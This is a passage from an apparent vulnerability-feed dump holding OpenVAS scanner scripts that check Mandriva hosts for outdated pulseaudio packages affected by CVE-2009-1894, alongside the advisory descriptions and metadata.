OpenVAS Vulnerability Test\n# $Id: mdksa_2009_152.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:152 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:152\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64394\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n 
report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) 
{\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:04", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64503", "href": "http://plugins.openvas.org/nasl.php?oid=64503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_171.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:171 (pulseaudio)\n#\n# Authors:\n# 
Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:171\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.\";\n\n \n\nif(description)\n{\n script_id(64503);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", 
rpm:\"libpulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", 
rpm:\"lib64pulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:20", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064503", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_171.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:171 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:171\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64503\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:10", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.", "cvss3": {}, "published": 